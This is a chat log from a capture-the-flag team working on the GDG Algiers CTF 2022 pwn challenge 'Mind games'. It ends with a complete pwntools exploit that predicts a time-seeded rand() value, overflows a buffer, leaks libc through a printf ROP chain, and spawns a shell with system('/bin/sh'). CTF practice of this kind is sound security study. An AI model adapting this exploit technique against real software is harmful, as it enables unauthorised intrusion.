Project Sekai
🔒 GDG Algiers CTF 2022 / ✅-pwn-mind-games
Mind games - 500 points
Category: Pwn
Description:
> Help! This program is playing mind games with me!
> You need to put an end to this madness.
> Note: The binary is already patched to use the provided library and linker.
Author: chenx3n
Files:
Tags: No tags.
Sutx pinned a message to this channel. 10/08/2022 11:00 AM
@crazyman ai wants to collaborate 🤝
@Piers wants to collaborate 🤝
ok this challenge just requires good network lol
🤣 1
11:42
disappointing finale
what's the case when pwn needs good network? except bruting
it uses time(0) for seed
11:43
well you can brute +-10 right?
well i have 1 try
lemme try some delay
11:43
and see if i can hit it once
@god lives in my skin wants to collaborate 🤝
@4n0nym4u5 wants to collaborate 🤝
@IceCreamMan wants to collaborate 🤝
IceCreamMan 10/08/2022 8:29 PM
is it possible to brute force? HAHA
Piers
and see if i can hit it once
IceCreamMan 10/08/2022 8:29 PM
seems hard ..
20:32
btw what's the flag format?
nah dont need to
20:32
Sth sth erudite
Piers
nah dont need to
IceCreamMan 10/08/2022 8:32 PM
is it possible to get the same time on local? I can't seem to hit the same time on local
possible
20:36
idk why i had a working exploit locally but not remotely
@Zafirr wants to collaborate 🤝
ok i got it, had to run it on my vps
Zafirr
used /ctf solve
✅ Challenge solved.
can i see your exploit?
20:46
don't know why mine failed
from pwn import *
import ctypes

libc = ELF('libc.so.6')
# p = process('./mind-games', env={"LD_PRELOAD": libc.path})
p = remote("pwn.chal.ctf.gdgalgiers.com", 1404)

# Reproduce the binary's rand() sequence: it seeds with time(0), so calling
# srand/rand from the same libc at the same second yields the same number.
LIBC = ctypes.cdll.LoadLibrary('libc.so.6')
LIBC.srand(LIBC.time(0))
ans = LIBC.rand()
print(ans)

flag = 0x4012d6
ret = 0x401361
printf_plt = 0x401150
got = 0x404030
pop_rdi = 0x00000000004014c3
main = 0x401362

# Round 1: answer padded to 16 chars, then ret sled, then leak a GOT entry via printf and return to main
p.sendlineafter("mind?", str(ans).rjust(16, "0").encode() + p64(ret)*10 + p64(pop_rdi) + p64(got) + p64(printf_plt) + p64(ret) + p64(main))
libc_leak = u64(p.recvuntil("\x7f")[-6:] + b'\x00\x00')
print(hex(libc_leak))
libc_base = libc_leak - 0x08ec50
system = libc_base + 0x0000000000055410
bin_sh = libc_base + 0x1b75aa

# Round 2: re-seed (a second may have passed) and call system("/bin/sh")
LIBC.srand(LIBC.time(0))
ans = LIBC.rand()
print(ans)
p.sendlineafter("mind?", str(ans).rjust(16, "0").encode() + p64(ret)*10 + p64(pop_rdi) + p64(bin_sh) + p64(system) + p64(ret) + p64(main))
p.interactive()
❤️ 1
yeah still don't know why 😶
probably just network issues
yeah maybe